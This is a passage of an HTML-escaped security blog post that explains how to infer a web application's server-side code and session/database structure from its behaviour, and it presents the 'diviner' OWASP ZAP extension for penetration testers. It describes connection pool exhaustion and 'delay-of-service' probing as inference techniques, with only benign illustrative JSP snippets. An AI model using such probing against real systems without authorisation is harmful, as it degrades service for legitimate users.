&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
If a large portion of the application&#39;s source code could be obtained
using &lt;u&gt;accurate&lt;/u&gt; &quot;fingerprinting&quot;, wouldn&#39;t that lead to the
same result?&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
In order to explain how this information can be obtained, let&#39;s use an
example:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Connection pool exhaustion (or consumption) is one of the many forms of
application denial of service attacks. It occurs when an attacker intentionally
accesses an entry point (page/web service, etc) that requires a database*
connection pool, using multiple threads – more threads the maximum amount of
connections in the pool. The attack will delay the responses from entry points
that rely on the pool, but won&#39;t affect entry points that don&#39;t use it
(assuming the amount of threads don&#39;t affect other resources).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although this behavior is an exposure in its own right, it also leads to
the following conclusion: &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
It is highly likely that somewhere in the entry point&#39;s code, a
connection is obtained from a connection pool, and since in many cases, a
connection pool is a mechanism used to interact with databases, it&#39;s highly
likely that the source code is similar to the following (jsp sample):&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #92CDDC; border-collapse: collapse; border: none; mso-background-themecolor: accent5; mso-background-themetint: 153; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;try {&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; Connection conn =
  DriverManager.getConnection(…);&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; …&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;} catch
  (…) {…}&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Of course – this connection pool might serve a different type of
resource, but using additional verifications we might be able to increase the
level of certainty – for example, identifying erroneous databases responses in
the same entry point, or even detecting certain exposures in other application
entry points. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The same approach can be used to convert other behaviors to the lines of
code that might have caused them, and since the previous process gathered a lot
of behaviors – these can be converted into a fair amount of code - pseudo code
that can be presented using any specific syntax, and enable the tester to
understand how a certain page behaves – prior to testing that page.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
For example, input sent from one page (the &quot;source&quot; page), but
reflected in another (the &quot;target&quot; page) is &lt;b&gt;probably&lt;/b&gt; shared
through a session variable, file or database field. The origin can be isolated
by accessing the target page using a &lt;b&gt;different&lt;/b&gt; session identifier, but using
the same identical process used to access it before (login, history, etc) -
with the exception of the source page;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
If the reflected input is not present in the target page, the
probability for the existence of the following lines of code in the source page
and target page increases:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Source Page:&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #92CDDC; border-collapse: collapse; border: none; mso-background-themecolor: accent5; mso-background-themetint: 153; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;String
  input1 = request.getParameter(&quot;input1&quot;);&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;session.setAttribute(&quot;sessionValue1&quot;,
  input1 );&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Target Page:&lt;/div&gt;
&lt;div align=&quot;left&quot; dir=&quot;ltr&quot;&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;background: #92CDDC; border-collapse: collapse; border: none; mso-background-themecolor: accent5; mso-background-themetint: 153; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0cm 5.4pt 0cm 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 426.1pt;&quot; valign=&quot;top&quot; width=&quot;568&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: purple;&quot;&gt;out.println(session.getAttribute(&quot;sessionValue1&quot;));&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
If however, the reflected input would have been present at the
verification scenario, than the source code matching the pattern will probably
include database access, file access or static server variables – and specific
aspects of these behaviors can be isolated in turn (insert statements are more
likely to exist in pages that rapidly increase in size, update statements in
pages with relatively static size and persistent changes, etc).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
At the end of the processes, after performing additional verifications
and tests, the options with the highest probability will be selected and
presented to the user.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
And how will this code be sorted? Which lines will appear first? &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although the sorting problem has many solutions, one of the main
solutions is probably &quot;delay-of-service&quot; attacks (yes, I said delay,
not deny). &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Presented in the research &quot;&lt;a href=&quot;http://www.google.co.il/url?sa=t&amp;amp;rct=j&amp;amp;q=&amp;amp;esrc=s&amp;amp;source=web&amp;amp;cd=3&amp;amp;ved=0CFQQFjAC&amp;amp;url=http%3A%2F%2Fpuzzlemall.googlecode.com%2Ffiles%2FTemporal%2520Session%2520Race%2520Conditions%2520(TSRC)%2520-%2520Sept%25202011%2520-%2520Presentation.pptx&amp;amp;ei=zu4WUPeiLI_Ts&quot;&gt;Temporal
Session Race Conditions&lt;/a&gt;&quot;, these attacks were originally meant to delay
the execution of &lt;u&gt;specific&lt;/u&gt; lines of code, in order to extend the lifespan
of temporary session variables – but these attacks can also be used to sort &lt;u&gt;some&lt;/u&gt;&lt;b&gt;
&lt;/b&gt;of the code – by inspecting if exceptions or conditional behaviors occur
instead of the delay, before the delay, after the delay or not at all.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
For example, performing a connection pool exhaustion attack on a page
while simultaneously sending an error generating value to the same vulnerable page
will provide a potentially important piece of information – which code is
executed first: the code that attempts to obtain a connection from the pool, or
the code that is prone to the exception.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;Note - Although this method isn&#39;t exactly &quot;safe&quot;, it
will probably enhance the results more than other methods for sorting divined
lines of code.&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Like fingerprinting, this information might not be 100% accurate
(although it can be &lt;b&gt;VERY&lt;/b&gt; accurate, if the processes is performed
properly and thoroughly), but can still be very beneficial for the purpose of
the test – just like other forms of fingerprinting.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
I won&#39;t expand the subject of source code divination in this post (I do
have plans to discuss it further in separate posts), but it&#39;s already
implemented in the diviner extension that will be discussed in the following
sections.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYtnnSrkZquV2UIV0g0dbQ57lEDY-rUjhQxu7BgqALqWd89XL0V-Ko69bP8uTd0LEVZSAvyOFx-fzQVU9B7OKrQM8Ae1V8Y4ZjPcHNiq1sMCM3Xvq-mPvriWt5_RlbKNQmoOLh8-pMnqk/s1600/diviner-poc-server-source-code-divination-clairvoyance-feature.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;454&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiYtnnSrkZquV2UIV0g0dbQ57lEDY-rUjhQxu7BgqALqWd89XL0V-Ko69bP8uTd0LEVZSAvyOFx-fzQVU9B7OKrQM8Ae1V8Y4ZjPcHNiq1sMCM3Xvq-mPvriWt5_RlbKNQmoOLh8-pMnqk/s640/diviner-poc-server-source-code-divination-clairvoyance-feature.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;Memory Structure
Divination and Cross Entry-Point Effects&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
In the previous process, we have discussed how an identified behavior
(such as an exception or input reflection) can be classified as persistent or
temporary – by reproducing the scenario that caused it using a different
session identifier, identical process, and without accessing the &quot;entry
point&quot; (source page). This process, alongside additional verifications
allowed us to conclude whether a behavior is persistent, temporary or something
else.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Although not all the behaviors rely on specific variables that are
stored in the server side, some do, and from these behaviors we can conclude
how and where does the server stores some of the content.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
By crossing the information obtained from interesting scenarios that
were discovered in the process, we can even &lt;b&gt;locate multiple entry points
that affect the same database tables, fields, session variables and static
variables,&lt;/b&gt; and thus, construct a general structure of database tables and
session attributes&lt;b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVLjFP1e1cwWVhmP9_xVsh-xoQ-KUWnow6DwyR2wWY-tGhga01mbDIOLqZYhlW809S3-pVdq7-W_IOrlLz-JxTVTteNwdqzMb2OgPyb_L0N1yZWUkZmJYhwb6Ld1VbeA777g-IkM6-GZc/s1600/diviner-poc-server-memory-divination-and-leads-for-cross-page-peristent-attacks.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;388&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVLjFP1e1cwWVhmP9_xVsh-xoQ-KUWnow6DwyR2wWY-tGhga01mbDIOLqZYhlW809S3-pVdq7-W_IOrlLz-JxTVTteNwdqzMb2OgPyb_L0N1yZWUkZmJYhwb6Ld1VbeA777g-IkM6-GZc/s640/diviner-poc-server-memory-divination-and-leads-for-cross-page-peristent-attacks.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
It&#39;s key to understand that the process does not verify the existence of
any exposures or attempts to exploit any vulnerability; instead, it&#39;s simply
uses a method of deduction to attempt to present what&#39;s going on behind the
scenes,&amp;nbsp; in order for this information to
enhance the abilities of a tester, or a scanner.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 16pt; line-height: 115%;&quot;&gt;The Diviner
Extension&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
During the last year, I collaborated with a number of individuals
(especially with @Secure_ET, various colleagues and the OWASP ZAP project) so
that these ideas will not remain a theory… and after numerous late night
brainstorming sessions, various incarnations and a long development period – we
have an initial version that &lt;u&gt;works&lt;/u&gt; (beta phase).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The diviner platform – an active information gathering platform that
implements many of the previously described concepts, is implemented as a ZAP
proxy extension, and can be downloaded from the following address:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://code.google.com/p/diviner/&quot;&gt;http://code.google.com/p/diviner/&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
It can already illustrate server side behaviors and processes, contains
features such as the task list/advisor which provide invaluable leads to
potential exposures, present a partial map of the server side memory, &lt;b&gt;and
present a partial representation of the server side code&lt;/b&gt;.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The extension is deployed using a windows installer (or in binary format
for other operating systems), and requires java 1.7.x and ZAP 1.4.0.1 in order
to run properly.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Furthermore, since it attempts to identify behaviors that result from
valid &amp;amp; invalid scenarios, and can&#39;t guess what is valid on its own, it
must be used after a short manual crawling process that covers the important
application sections with &lt;b&gt;valid&lt;/b&gt; values.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
It was tested mostly on small scale applications (100+- parameters,
+-50) – including real-life applications, and although it will probably work on
larger applications (it&#39;s &lt;b&gt;not&lt;/b&gt; stuck in the database analysis process –
be patient) – due to various optimizations (and sacrifices) we didn&#39;t yet make
– it&#39;s recommended not to exceed that size.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
We can currently identify 20+- different lines of code, but have plans
to implement tests that identify other lines of code, some with high
probability, and some with absolute certainty.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
We didn&#39;t yet implement features that sort the lines of code (and thus,
currently rely on default positioning), but plan on implementing them in the
future (with restrictions that will prevent their use for actual denial/delay
of service attacks).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
We have many additional experimental features that aren&#39;t mature enough,
but are already working on refining them for the future versions.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
We don&#39;t perform any form of automated vulnerability scanning, but plan
on exporting the interesting leads to a format that can be used by external
scanners to detect exposures in these abnormal scenarios.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Bottom line - It&#39;s not perfect yet, but it&#39;s already very useful, and
can already help testers locate exposures that can&#39;t be located using other
means, and make better decisions - quicker.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;Acknowledgements &lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The diviner project was funded by Hacktics ASC.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
The following individuals assisted me in various ways, and deserve acknowledgment for their contribution:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;a href=&quot;http://twitter.com/secure_et&quot;&gt;Eran Tamari&lt;/a&gt; (The lead
developer) - for the countless hours of development, the sheer determination, and
most of all, for being a true believer.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; text-align: left; unicode-bidi: embed;&quot;&gt;
Simon Bennetts (&lt;a href=&quot;http://twitter.com/psiinon&quot;&gt;psiinon&lt;/a&gt;) and &lt;a href=&quot;https://twitter.com/a_c_neumann&quot;&gt;Axel Neumann&lt;/a&gt; - The projects leaders
of the OWASP Zed Attack Proxy (ZAP) project - for providing support, useful
